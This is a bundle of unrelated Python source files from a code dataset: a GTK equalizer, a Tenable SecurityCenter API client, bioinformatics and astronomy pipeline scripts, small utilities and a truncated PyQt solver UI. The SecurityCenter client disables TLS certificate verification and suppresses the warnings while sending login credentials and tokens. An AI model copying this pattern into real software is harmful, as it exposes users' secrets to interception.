slider = self._sliders[slider_index]\n\n # get X\n x = self._border_width + self._slider_width * slider_index\n\n # center and top Y of handle\n ma_mi_diff = self._ma - self._mi\n center_y = self._ma - round(slider.get_value() * ma_mi_diff)\n top_y = center_y - self._handle_padding\n\n # vertical guide\n cr.set_source_rgb(vgfg[0], vgfg[1], vgfg[2])\n cr.set_line_width(1)\n nx = x + round(hw / 2)\n cr.move_to(nx, self._mi)\n cr.line_to(nx, self._ma)\n cr.stroke()\n\n # slider bar\n mid = self._ma - round(slider.get_mid() * ma_mi_diff)\n cr.set_source_rgb(sbg[0], sbg[1], sbg[2])\n if is_hover:\n cr.set_source_rgb(sbhg[0], sbhg[1], sbhg[2])\n cr.rectangle(x + self._offset_sb, mid, self._sbw, center_y - mid)\n cr.fill()\n\n # handle\n cr.set_source_rgb(hfg[0], hfg[1], hfg[2])\n if is_hover:\n cr.set_source_rgb(hhfg[0], hhfg[1], hhfg[2])\n cr.rectangle(x, top_y, hw, hh)\n cr.fill()\n\n # label\n cr.select_font_face('sans-serif')\n cr.set_font_size(9)\n cr.move_to(x + 1, height + 3 * self._border_width)\n cr.set_source_rgb(lfg[0], lfg[1], lfg[2])\n cr.show_text(slider.format_label())\n\n # value\n value = slider.format_value()\n cr.select_font_face('Fixed', cairo.FONT_SLANT_NORMAL,\n cairo.FONT_WEIGHT_NORMAL)\n cr.set_font_size(9)\n cr.set_source_rgb(vfg[0], vfg[1], vfg[2])\n if is_hover:\n cr.set_source_rgb(hhfg[0], hhfg[1], hhfg[2])\n cr.move_to(x + 1, height + 3 * self._border_width + 12)\n cr.show_text(value)\n\n def _draw_sliders(self, cr, clip_rect):\n # do we even have sliders?\n if len(self._sliders) == 0:\n return\n\n # now we will only redraw the sliders that are affected by the clip region\n clip_x = clip_rect.x\n clip_w = clip_rect.width\n t_x = clip_x - self._border_width\n if t_x < 0:\n first_index = 0\n else:\n first_index = self._get_slider_index_at_x(t_x)\n last_index = self._get_slider_index_at_x(t_x + clip_w - 1)\n if last_index is None:\n last_index = len(self._sliders) - 1\n indexes = range(first_index, last_index + 1)\n\n # draw\n for slider_index 
in indexes:\n self._draw_slider(cr, slider_index)\n\n def _on_draw(self, drawing_area, cr):\n do_draw, clip_rect = Gdk.cairo_get_clip_rectangle(cr)\n if not do_draw:\n return False\n\n self._draw_sliders(cr, clip_rect)\n\n return False\n\n def _update_slider_at_pos(self, x, y):\n width, height = self._get_sliders_size()\n padding = self._get_handle_height() / 2\n x = round(x)\n y = round(y)\n mi = padding\n ma = height - padding\n if x < 0 or x >= width:\n return\n if y < mi:\n y = mi\n if y >= ma:\n y = ma\n\n # set slider's new value\n value = (ma - y) / (ma - mi)\n slider = self._get_slider_at_x(x)\n slider.set_value(value)\n\n def _redraw_slider_index(self, index):\n width, height = self._get_size()\n clip_x = self._border_width + index * self._slider_width\n clip_w = self._slider_width\n self.queue_draw_area(clip_x, 0, clip_w, height)\n\n def _on_button_press(self, widget, ev):\n x, y = self._translate_xy(ev.x, ev.y)\n if ev.button != 1:\n return\n self._locked_x = None\n if ev.state & Gdk.ModifierType.CONTROL_MASK:\n self._locked_x = x\n self._pressed = True\n self._update_slider_at_pos(x, y)\n index = self._get_slider_index_at_x(x)\n if index is not None:\n self._redraw_slider_index(index)\n\n def _on_button_release(self, widget, ev):\n if ev.button != 1:\n return\n x, y = self._translate_xy(ev.x, ev.y)\n self._locked_x = None\n self._pressed = False\n index = self._get_slider_index_at_x(x)\n if index is not None:\n self._redraw_slider_index(index)\n\n def _on_motion(self, widget, ev):\n x, y = self._translate_xy(ev.x, ev.y)\n if self._locked_x:\n x = self._locked_x\n cur_slider_index = self._get_slider_index_at_x(x)\n if cur_slider_index is None:\n if self._hover_slider_index is not None:\n self._redraw_slider_index(self._hover_slider_index)\n self._hover_slider_index = None\n return\n if self._hover_slider_index is not None:\n if cur_slider_index != self._hover_slider_index:\n # undraw old hover\n self._redraw_slider_index(self._hover_slider_index)\n 
self._hover_slider_index = None\n\n # update value?\n if self._pressed:\n self._update_slider_at_pos(x, y)\n\n # redraw slider\n self._hover_slider_index = cur_slider_index\n self._redraw_slider_index(cur_slider_index)\n\n def _on_scroll(self, widget, ev):\n y_scroll = ev.get_scroll_deltas()[2]\n x, y = self._translate_xy(ev.x, ev.y)\n slider = self._get_slider_at_x(x)\n if slider is None:\n return\n value = slider.get_value()\n if y_scroll < 0:\n value += slider.get_scroll_incr()\n if value > 1:\n value = 1\n elif y_scroll > 0:\n value -= slider.get_scroll_incr()\n if value < 0:\n value = 0\n slider.set_value(value)\n index = self._get_slider_index_at_x(x)\n if index is not None:\n self._redraw_slider_index(index)\n\n def _on_configure(self, widget, ev):\n self._precompute_stuff()\n\n def _on_enter(self, widget, ev):\n pass\n\n def _on_leave(self, widget, ev):\n if self._pressed:\n return\n if self._hover_slider_index is not None:\n self._redraw_slider_index(self._hover_slider_index)\n self._hover_slider_index = None\n\n\nclass EqWindow(Gtk.Window):\n INITIAL_NB_SLIDERS = 16\n GUTTER = 15\n MIN_HEIGHT = 300\n DEF_SLIDERS_BG_COLOR = (0.1, 0.1, 0.1)\n\n def __init__(self):\n # init parent window\n Gtk.Window.__init__(self, title=\"gpaeq\")\n\n # UI and stuff\n self._make_me_nice()\n self._init_ui()\n\n # signals\n self._on_resize_handle = self.connect('check-resize', self._on_resize)\n\n def _make_me_nice(self):\n self.set_position(Gtk.WindowPosition.CENTER)\n self.set_border_width(EqWindow.GUTTER)\n self.set_icon_from_file('res/equalizer.png')\n\n def _init_ui(self):\n # vbox for top and bottom\n self._vbox = Gtk.VBox(homogeneous=False, spacing=EqWindow.GUTTER)\n self.add(self._vbox)\n\n # init sliders\n self._init_top()\n self._init_bottom()\n\n def _init_top(self):\n # box\n self._top_hbox = Gtk.HBox(homogeneous=False, spacing=EqWindow.GUTTER)\n self._vbox.pack_start(self._top_hbox, False, False, 0)\n\n # list of sinks\n self._init_sinks_combo()\n\n def 
_init_bottom(self):\n # box for preamp and EQ sliders\n self._sliders_ev_box = Gtk.EventBox()\n self._sliders_hbox = Gtk.HBox(homogeneous=False, spacing=0)\n self._sliders_ev_box.add(self._sliders_hbox)\n def_color = EqWindow.DEF_SLIDERS_BG_COLOR\n bg_color = Gdk.Color(red=def_color[0] * 65535,\n blue=def_color[1] * 65535,\n green=def_color[2] * 65535)\n self._sliders_ev_box.modify_bg(Gtk.StateType.NORMAL, bg_color)\n self._vbox.pack_start(self._sliders_ev_box, True, True, 0)\n\n # init sliders\n self._init_preamp_slider()\n self._init_eq_sliders()\n\n def _init_sinks_combo(self):\n # label\n lbl = Gtk.Label(label='Sink:')\n lbl.modify_font(Pango.FontDescription('sans-serif 9'))\n self._top_hbox.pack_start(lbl, False, False, 0)\n\n # combo\n self._sinks_store = Gtk.ListStore(str)\n self._sinks_store.append(['alsa_output.pci-0000_01_00.1.hdmi-stereo'])\n self._sinks_store.append(['alsa_output.pci-0000_00_14.2.analog-stereo'])\n self._sinks_combo = Gtk.ComboBox.new_with_model(self._sinks_store)\n renderer_text = Gtk.CellRendererText()\n self._sinks_combo.modify_font(Pango.FontDescription('sans-serif 8'))\n self._sinks_combo.pack_start(renderer_text, True)\n self._sinks_combo.add_attribute(renderer_text, \"text\", 0)\n self._sinks_combo.set_active(0)\n self._top_hbox.pack_start(self._sinks_combo, False, False, 0)\n\n def _init_preamp_slider(self):\n self._preamp_sliders = Sliders()\n preamp_slider = EqDbSliderModel(0, 0, -12, 12, lambda: None)\n preamp_slider.set_scroll_incr(0.005)\n sliders_width = self._preamp_sliders.get_width_for_nb_sliders(1)\n self._preamp_sliders.set_sliders([preamp_slider])\n self._preamp_sliders.set_size_request(sliders_width, EqWindow.MIN_HEIGHT)\n self._sliders_hbox.pack_start(self._preamp_sliders, False, True, 0)\n\n def _init_eq_sliders(self):\n self._eq_sliders = Sliders()\n sliders = self._new_sliders(EqWindow.INITIAL_NB_SLIDERS)\n sliders_width = self._eq_sliders.get_width_for_nb_sliders(EqWindow.INITIAL_NB_SLIDERS)\n 
self._eq_sliders.set_sliders(sliders)\n self._eq_sliders.set_size_request(sliders_width, EqWindow.MIN_HEIGHT)\n self._sliders_hbox.pack_start(self._eq_sliders, True, True, 0)\n\n def _new_sliders(self, nb):\n sliders = []\n for i in range(nb):\n slider = EqDbSliderModel(i / nb * 20000, 0, -12, 12, lambda: None)\n slider.set_scroll_incr(0.005)\n sliders.append(slider)\n return sliders\n\n def _on_resize(self, window):\n nb_sliders = self._eq_sliders.get_nb_fitting_sliders()\n sliders = self._new_sliders(nb_sliders)\n self._eq_sliders.set_sliders(sliders)\n\n\ndef main():\n # enable Ctrl+C\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n # main app\n win = EqWindow()\n win.connect('delete-event', Gtk.main_quit)\n win.show_all()\n Gtk.main()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"gpaeq.py","file_name":"gpaeq.py","file_ext":"py","file_size_in_byte":20155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"57139124","text":"import json\nimport sys\nimport requests\nimport pprint\nimport urllib\n\nrequests.packages.urllib3.disable_warnings()\n\n\nclass SecurityCenterAPI: \n url = \"https://10.14.226.13\"\n username = \"\"\n password = \"\"\n token = ''\n cookie = ''\n\n def __init__(self): \n self.data = {}\n \n def set_url(self, url):\n self.url = url\n\t\t\n def build_url(self, restCall):\n \"\"\" Formats the SC URL with the rest API call\"\"\"\n return '{0}{1}'.format(self.url, restCall)\n\n def connect(self, method, resource, data=None, headers=None, cookies=None):\n \"\"\" The connect method is used to connect to SC and pass our API calls.\"\"\"\n if headers is None:\n headers = {'Content-type': 'application/json',\n 'X-SecurityCenter': str(self.token)}\n if data is not None:\n data = json.dumps(data)\n\n if method == \"POST\":\n r = requests.post(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n verify=False)\n elif method == \"DELETE\":\n r = 
requests.delete(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n verify=False)\n elif method == 'PATCH':\n r = requests.patch(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n verify=False)\n else:\n r = requests.get(self.build_url(resource), data=data, headers=headers, cookies=self.cookie,\n verify=False)\n\n if r.status_code != 200:\n e = r.json()\n print(e['error_msg'])\n sys.exit()\n\n return r\n\n\n def login(self, uname, pword):\n \"\"\" Logs into SecurityCenter and retrieves our token and cookie.\n We create a seperate header here since we do not have a X-SecurityCenter token yet.\"\"\"\n headers = {'Content-Type':'application/json'}\n login = {'username': uname, 'password':pword}\n self.username = uname;\n self.password = pword;\n\n # We use the connect function and pass it a POST method, /rest/token resource,\n # and our login credentials as data. We also pass our headers from above for this function.\n # if the credentials fails to get token sys.exit will be called. \n data = self.connect('POST', '/rest/token', data=login, headers=headers)\n\n # We can pull the cookie out of our data object and store it as a variable.\n self.cookie = data.cookies\n\n # We can alo pull our token out from the returned data as well.\n self.token = data.json()['response']['token']\n return (self.cookie, self.token)\n\n # ------ UNCOMMENT THE CODE BELOW TO ENABLE THE FUNCTION. THIS WAS LEFT IN FOR REFERENCE. ------ #\n # ------ LINES WITH '##' ARE COMMENTS, YOU DO NOT NEED TO UNCOMMENT THOSE LINES. 
------ #\n def get_assets(self):\n # Initiate an empty asset list.\n assets = []\n\n # Use the connect function with a GET method and /rest/asset resource.\n data = self.connect('GET', '/rest/asset')\n\n # Store the manageable assets in the results variable.\n results = data.json()['response']['manageable']\n\n # If results is empty, there are no manageable assets and the script exits.\n if not results:\n sys.exit(\"This user has no managed assets.\")\n else:\n # For each asset in our results file, append the asset ID to our asset list.\n for i in results:\n assets.append(i['id'])\n return assets\n\n def get_asset_by_id(self, id):\n #Get the asset group by its id. The ID should be a number\n data = self.connect('GET', '/rest/asset/{0}'.format(id))\n \n results = data.json()['response'];\n \n if not results:\n sys.exit(\"no managed assets\")\n else: \n return results;\n \n def update_hosts_by_asset_id(self, id, hosts_ips):\n #Post the hosts private IPs to the asset identified by ID\n #hosts_ips is an array of ips. \n patch_records = {'definedIPs' : ', '.join(hosts_ips)};\n \n data = self.connect('PATCH', '/rest/asset/{0}'.format(id), patch_records)\n results = data.json()['response'];\n \n if not results:\n sys.exit(\"No response from patch operation\");\n else:\n return results;\n \n def get_analysis_by_id(self, scanId): \n #Post the hosts with a commmand to get analysis by scanID. \n #scanID is an integer of the scan. 
\n\n begin_offset = 0;\n end_offset = 50;\n totalRecords = 50;\n totalRecordsIsValid = False;\n allAnalysisRecords = [];\n scanIDStr = str(scanId)\n\n\n while (begin_offset < totalRecords):\n query_data = {\n \"query\": {\n \"createdTime\":0,\n \"modifiedTime\":0,\n \"groups\":[],\n \"type\":\"vuln\",\n \"tool\":\"sumid\",\n \"sourceType\":\"individual\",\n \"startOffset\":begin_offset,\n \"endOffset\":end_offset,\n \"filters\":[],\n \"sortColumn\":\"severity\",\n \"sortDirection\":\"desc\",\n \"scanID\": scanIDStr, \n \"view\": \"all\"\n },\n \"sourceType\": \"individual\",\n \"scanID\": scanIDStr,\n \"sortField\": \"severity\",\n \"sortDir\": \"desc\",\n \"columns\":[],\n \"type\":\"vuln\"\n };\n\n data = self.connect('POST', '/rest/analysis', query_data);\n results = data.json()['response'];\n\n if (totalRecordsIsValid == False): \n #update totalRecords count once and only once\n totalRecords = results['totalRecords']\n totalRecords = int(totalRecords)\n totalRecordsIsValid = True; \n #print 'totalRecords: ' + totalRecords\n\n returnedRecordsCount = results['returnedRecords']\n #print 'returnedRecordsCount: ' + str(returnedRecordsCount);\n\n returnedRecords = results['results'];\n #print 'first record: ' + str(returnedRecords[0])\n allAnalysisRecords.extend(returnedRecords);\n begin_offset += returnedRecordsCount; \n #print 'begin_offset: ' + str(begin_offset)\n end_offset += returnedRecordsCount;\n #print 'end_offset: ' + str(end_offset)\n\n if not results: \n sys.exit(\"No response from patch operation\");\n \n return allAnalysisRecords\n\n def get_respository_fields(self): \n # this function apparently pulls the repository data. \n # this data will subsequently be used to construct a statement for acceptRiskRule API\n \n query_string = { 'fields' : 'name,description,type,dataFormat,modifiedTime,vulnCount,ipCount,typeFields'};\n encoded_query_string = urllib.urlencode(query_string)\n data = self.connect('GET', '/rest/repository'+ '?' 
+ encoded_query_string);\n results = data.json()['response']\n\n return results;\n\n\n def acceptRiskSingleItem(self, pluginId, comments, expiration_date, hostType, name, repositories): \n query_data = {\n \"comments\": comments,\n \"expires\": expiration_date, #mockup, the real value is the epoch time of the date. \n \"hostType\": \"all\", #mockup\n #\"name\": \"RHEL-06-000019 - There must be no .rhosts or hosts.equiv files on the system - ~/.rhosts.\", #mockup \n \"name\": name,\n \"newSeverity\": {\n \"id\": 3\n },\n \"plugin\": {\n \"id\": str(pluginId)\n },\n \"port\": \"0\",\n \"protocol\": 6,\n \"repositories\": repositories\n }\n\n data = self.connect('POST', '/rest/acceptRiskRule', query_data)\n\n result = data.json()['response']\n\n return result;\n\n def postAcceptRiskSingleItem(self, query_data): \n data = self.connect('POST', '/rest/acceptRiskRule', query_data);\n result = data.json()['response'];\n return result;\n\n def transformRepositoriesForAcceptRisk(self, resposRawData):\n transformedReposArray = [];\n for repo in resposRawData : \n transformedRepo = {\n \"context\": \"\",\n \"correlation\": [],\n \"createdTime\": None, #-1 is for forever, transform to EpochTime for date/month/year\n \"dataFormat\": \"IPv4\",\n \"description\": repo[\"description\"],\n \"id\": repo[\"id\"],\n \"ipRange\": repo[\"typeFields\"][\"ipRange\"],\n \"modifiedTime\": repo[\"modifiedTime\"],\n \"name\": repo[\"name\"],\n \"organizations\": [],\n \"status\": None,\n \"trendWithRaw\": repo[\"typeFields\"][\"trendWithRaw\"],\n \"trendingDays\": repo[\"typeFields\"][\"trendingDays\"],\n \"type\": repo[\"type\"]\n }\n\n transformedReposArray.append(transformedRepo);\n\n return transformedReposArray\n\n \n #todo: take one line single item of vulnerabilty, get the respositories, fill it in the vuln request, \n # get the date, put in the date. 
\n","sub_path":"SC5API.py","file_name":"SC5API.py","file_ext":"py","file_size_in_byte":9418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"320438446","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 6 13:44:15 2018\n\n@author: hashemk\n\"\"\"\n\nfrom Aligner import Aligner\nfrom Neoantigen import Neoantigen\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n\n\n\n\ndef immuno_app():\n\n \n test_xml_fname = '../pyFitnessNeoantigen/neoantigens_AL4602_iedb.xml'\n neo_fname = '/Users/hashemk/Desktop/Fitness_Model/SupplementaryDataFile7/InputData/neoantigens_Rizvi.txt'\n aln_dname = '/Users/hashemk/Desktop/Fitness_Model/SupplementaryDataFile7/InputData/neoantigen_alignments_Rizvi'\n fitness_output_fname = '/Users/hashemk/Desktop/Fitness_Model/SupplementaryDataFile7/MyTestOutput/neoantigens_Rizvi_fitness.txt'\n a = 26\n k = 4.86936\n eps = 1e-5\n \n \n [neoantigens, samples] = read_neoantigens(neo_fname)\n# [neoantigens, samples] = read_neoantigens_old(neo_fname)\n \n aligner = Aligner()\n for s in samples:\n xml_path = aln_dname + \"/neoantigens_\" + s + \"_iedb.xml\"\n# print(xml_path)\n aligner.read_blastp_xml(xml_path)\n aligner.compute_R(a= a, k=k)\n \n \n \n \n output_f = open(fitness_output_fname, 'w')\n header = ['NeoantigenID', 'Mutation', 'Sample', 'mtPosition', 'ResidueChangeClass', 'mtPeptide', 'wtPeptide', 'Excluded', 'A', \n 'R', 'Recognition_Potential', 'WtToMt_R_Ratio', 'allele', 'HLA']\n header = '\\t'.join(header)\n output_f.write(header+'\\n')\n \n for nid in neoantigens.keys():\n neo = neoantigens[nid]\n W = neo.get_weight() # excludes neoantigens that mutated from nonhydorphobic residue on position 2 or 9\n A = neo.get_A()\n mtpeptide = neo.mtPeptide #mutant peptide\n wtpeptide = neo.wtPeptide\n neo_mut_full_id = 'MUT_' + str(nid) + '_' + neo.coord \n neo_wt_full_id = 'WT_' + str(nid) + '_' + neo.coord \n \n \n R_mt = 
aligner.get_R(neo_mut_full_id) \n R_wt = aligner.get_R(neo_wt_full_id)\n fitness = A * R_mt * W\n \n A_wt_to_A_mt_log_ratio = np.log10( (R_wt + eps) / (R_mt+ eps) ) # eps to prevent dividing by zeros\n \n \n residue_change = neo.residue_change\n w = neo.get_weight()\n excluded = 1-w\n l = [nid, neo.coord, neo.sample, neo.position, residue_change, mtpeptide, wtpeptide, excluded, A, R_mt, \n fitness, A_wt_to_A_mt_log_ratio, neo.allele, neo.HLA]\n l = '\\t'.join(map(lambda s: str(s), l))\n output_f.write(l+'\\n')\n output_f.close()\n \n \n\n\n\ndef read_neoantigens(neo_fname):\n neoantigens = dict()\n neo_df = pd.read_csv(neo_fname, sep='\\t')\n print(neo_df.shape)\n \n # filter out rows for which the column 7 (MT.Score) is not defined\n neo_df = neo_df[neo_df.iloc[: , 7] != None]\n num_neos = neo_df.shape[0]\n for i in range(num_neos):\n one_row = np.array(neo_df.iloc[i, :])\n neoantigen = Neoantigen(one_row)\n neoantigens[neoantigen.id] = neoantigen\n neoantigen.set_A()\n samples = set(map(lambda neo: neo.get_sample_name(), neoantigens.values()))\n return([neoantigens, samples])\n\n \ndef read_neoantigens_odl(neo_fname):\n neoantigens = dict()\n \n f = open(neo_fname)\n header = f.readline()\n htab = header.strip().split('\\t')\n print(htab)\n \n hdict = dict()\n \n for i in range(0, len(htab)):\n hdict[htab[i]] = i\n line = f.readline()\n while line:\n line = line.strip()\n nparams = line.split('\\t')\n if nparams[7] == 'NA':\n line = f.readline()\n continue\n neoantigen = Neoantigen(nparams)\n neoantigens[neoantigen.id] = neoantigen\n neoantigen.set_A()\n line = f.readline()\n f.close()\n samples = set(map(lambda neo: neo.get_sample_name(), neoantigens.values())) \n \n return([neoantigens, samples])\n \n\nif __name__ == '__main__':\n 
immuno_app()","sub_path":"pyEpitope/pyImmunogenecity/immunogenecity_main.py","file_name":"immunogenecity_main.py","file_ext":"py","file_size_in_byte":3908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"138350536","text":"num = []\na = 0\nohno = input(\"To find the sum and average of a string of numbers please key in the number seperated by a space: \")\nnum = ohno.split()\nsum = 0\ncount = 0\nfor i in range(len(num)):\n a = int(num[i])\n sum += a\n count += 1\navg = sum/count\nprint(\"The sum of number is: {}, the average is: {:.2f}\".format(sum,avg)) \n","sub_path":"Early Assignments/A2/A2Q1.py","file_name":"A2Q1.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"540322398","text":"\nimport argparse\nfrom ctapipe.utils import get_dataset_path\n\nfrom lstchain.reco import dl0_to_dl1\nfrom lstchain.reco import dl1_to_dl2\nfrom lstchain.visualization import plot_dl2\nimport matplotlib.pyplot as plt\nimport os\n\nparser = argparse.ArgumentParser(description = \"Train Random Forests.\")\n\n# Required argument\nparser.add_argument('--gammafile', '-fg', type=str,\n dest='gammafile',\n help='path to the dl1 file of gamma events for training',\n )\n\nparser.add_argument('--protonfile', '-fp', type=str,\n dest='protonfile',\n help='path to the dl1 file of proton events for training',\n )\n\nparser.add_argument('--storerf', '-srf', action='store', type=bool,\n dest='storerf',\n help='Boolean. True for storing trained RF in 3 files'\n 'Deafult=False, any user input will be considered True',\n default=False)\n\nparser.add_argument('--datafile', '-f', type=str,\n dest='datafile',\n help='path to the file with simtelarray events',\n default=get_dataset_path('gamma_test_large.simtel.gz'))\n\nparser.add_argument('--storeresults', '-s', action='store', type=bool,\n dest='storeresults',\n help='Boolean. 
True for storing the reco dl2 events'\n 'Default=False, any user input will be considered True',\n default=False)\n\n# Optional arguments\nparser.add_argument('--opath', '-om', action='store', type=str,\n dest='path_models',\n help='Path to store the resulting RF',\n default='./results/')\n\nparser.add_argument('--outdir', '-or', action='store', type=str,\n dest='outdir',\n help='Path where to store the reco dl2 events',\n default='./results/')\n\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n \n #Train the models\n \n features = ['intensity',\n 'time_gradient',\n 'width',\n 'length',\n 'wl',\n 'phi',\n 'psi']\n\n reg_energy, reg_disp, cls_gh = dl1_to_dl2.build_models(args.gammafile,\n args.protonfile,\n features,\n save_models=args.storerf,\n path_models=args.path_models,\n )\n\n #Get out the data from the Simtelarray file:\n \n data = dl0_to_dl1.get_events(args.datafile, False)\n\n \n #Apply the models to the data\n dl2 = dl1_to_dl2.apply_models(data, features, cls_gh, reg_energy, reg_disp)\n \n if args.storeresults==True:\n #Store results\n if not os.path.exists(args.outdir):\n os.mkdir(args.outdir)\n outfile = args.outdir + \"/dl2_events.hdf5\"\n dl2.to_hdf(outfile, key=\"dl2_events\", mode=\"w\")\n\n #Plot some results\n \n plot_dl2.plot_features(dl2)\n plt.show()\n plot_dl2.plot_E(dl2)\n plt.show()\n plot_dl2.plot_disp(dl2)\n plt.show()\n plot_dl2.plot_pos(dl2)\n plt.show()\n\n","sub_path":"scripts/lstpipe.py","file_name":"lstpipe.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"200205703","text":"\"\"\"\nUtility Classes\n\"\"\"\n\nimport sys\nimport collections\n\n# From https://github.com/benjaminp/six/blob/master/six.py\nPY2 = sys.version_info[0] == 2\nPY3 = sys.version_info[0] == 3\n\nstring_types = str\nfrom io import StringIO\n\n# 
https://stackoverflow.com/questions/16176742/python-3-replacement-for-deprecated-compiler-ast-flatten-function\n\n\ndef flatten(x):\n result = []\n\n for el in x:\n if isinstance(x, collections.Iterable) and not isstr(el):\n result.extend(flatten(el))\n else:\n result.append(el)\n return result\n\n\ndef isstr(s):\n return isinstance(s, str)\n\n\nclass _KwargParser:\n \"\"\"\n Helper function to emulate Python 3 keyword-only arguments.\n\n Use as::\n\n def func(x1, **kwargs):\n kw = KwargParser('func', kwargs)\n a = kw.pop('a')\n b = kw.pop('b', 2)\n kw.reject_remaining()\n ...\n\n To emulate the Python 3 syntax::\n\n def func(x1, *, a, b=2):\n ...\n \"\"\"\n def __init__(self, func_name, kwargs):\n self._func_name = func_name\n self._kwargs = kwargs\n\n def pop(self, arg_name, *default):\n try:\n return self._kwargs.pop(arg_name, *default)\n except KeyError:\n pass\n raise TypeError(\n '{}() missing required keyword-only argument {!r}'\n .format(self._func_name, arg_name)\n )\n\n def reject_remaining(self):\n if self._kwargs:\n # match the error message to what Python 3 produces\n bad_arg = next(iter(self._kwargs))\n raise TypeError(\n '{}() got an unexpected keyword argument {!r}'\n .format(self._func_name, bad_arg)\n )\n","sub_path":"galgebra/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"444415935","text":"import pip\nimport pkg_resources\nimport click\nimport sys\n\nfrom floyd.log import logger as floyd_logger\nfrom conda import cli as conda_cli\n\n\nPROJECT_NAME = \"floyd-cli\"\n\n\ndef pip_upgrade():\n pip.main([\"install\", \"--upgrade\", PROJECT_NAME])\n\n\ndef conda_upgrade():\n conda_cli.main(\"install\", \"-y\", \"-c\", \"floydhub\", \"-c\", \"conda-forge\", \"floyd-cli\")\n\n\n@click.command()\ndef version():\n \"\"\"\n Prints the current version of the CLI\n \"\"\"\n version = 
pkg_resources.require(PROJECT_NAME)[0].version\n floyd_logger.info(version)\n\n\n@click.command()\ndef upgrade():\n \"\"\"\n Upgrade floyd command line\n \"\"\"\n try:\n if 'conda' in sys.version or 'ontinuum' in sys.version:\n conda_upgrade()\n else:\n pip_upgrade()\n except Exception as e:\n floyd_logger.error(e)\n","sub_path":"floyd/cli/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"6240073","text":"from django.conf.urls import url\nfrom possiblebug.views import PublisherAutocomplete, AuthorAutocomplete\nfrom possiblebug import views\n\nurlpatterns = [\n\n\n url(\n r'^author-autocomplete/$',\n AuthorAutocomplete.as_view(),\n name='author-autocomplete',\n ),\n url(\n r'^publisher-autocomplete/$',\n PublisherAutocomplete.as_view(),\n name='publisher-autocomplete',\n ),\n\n url(r'^test/$', views.add_new_book, name=\"test\"),\n\n]","sub_path":"test_project/possiblebug/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"482928025","text":"# -*- coding: utf-8 -*-\nfrom PyQt5 import QtWidgets, QtGui, QtCore\nfrom MainWindow import Ui_MainWindow\n\nclass View(QtWidgets.QMainWindow):\n\n # Конструктор, створює базове представлення та пов'язує\n # Інтерфейс с Пред'явником\n def __init__(self, Presenter, Model, parent=None):\n super(QtWidgets.QMainWindow, self).__init__(parent)\n self.Presenter = Presenter\n self.Model = Model\n # Створення базового GUI\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n self.ui.tableCoef.cellChanged.connect(self.validate_cell)\n self.ui.tableFree.cellChanged.connect(self.validate_cell)\n self.ui.comboVarNumber.currentIndexChanged.connect(self.Presenter.change_varnum)\n self.ui.buttonGenerate.clicked.connect(self.Presenter.generate)\n 
self.ui.buttonSolveSystem.clicked.connect(self.Presenter.solve)\n self.n = 6\n self.ui.buttonSolveSystem.setDisabled(True)\n\n # Метод, що змінює Представлення у разі зміни моделі\n def model_changed(self, n=None, A=None, b=None):\n # Зміна таблиць та шрифту, якщо змінено розмір\n if n:\n self.ui.tableCoef.setRowCount(n)\n self.ui.tableCoef.setColumnCount(n)\n self.ui.tableFree.setRowCount(n)\n self.ui.tableVariables.setRowCount(n)\n self.n = n\n if n == 2:\n self.font = QtGui.QFont(\"Arial\", 27)\n elif n == 3:\n self.font = QtGui.QFont(\"Arial\", 24)\n elif n == 4:\n self.font = QtGui.QFont(\"Arial\", 21)\n elif n == 5:\n self.font = QtGui.QFont(\"Arial\", 18)\n elif n == 6:\n self.font = QtGui.QFont(\"Arial\", 15)\n # Заміна елементів у разі зміни СЛАУ (A і b)\n # Зміна шрифту у разі зміни розміру\n for i in range(self.n):\n if b:\n item = QtWidgets.QTableWidgetItem(str(b[i]))\n self.ui.tableFree.setItem(i, 0, item)\n else:\n item = self.ui.tableFree.item(i, 0)\n if item and n:\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n for j in range(self.n):\n if A:\n item = QtWidgets.QTableWidgetItem(str(A[i][j]))\n self.ui.tableCoef.setItem(i, j, item)\n else:\n item = self.ui.tableCoef.item(i, j)\n if item and n:\n item.setFont(self.font)\n item.setTextAlignment(QtCore.Qt.AlignCenter)\n\n # Перевірка на коректність введених даних\n # У разі помилки виводить повідомлення\n # Інакше передає управління Пред'явнику\n def validate_cell(self, row, column):\n table_sender = self.sender()\n table_name = 0 if table_sender.columnCount() == 1 else 1\n item = table_sender.item(row, column)\n def is_number(s):\n try:\n float(s)\n return True\n except ValueError:\n return False\n if item:\n text = item.text()\n text = text.strip()\n if text == '':\n item.setText('')\n self.ui.buttonSolveSystem.setDisabled(True)\n self.Presenter.clear_variables()\n elif not is_number(text):\n QtWidgets.QMessageBox.warning(self, \"Помилка вводу!\", \"У матриці мають бути 
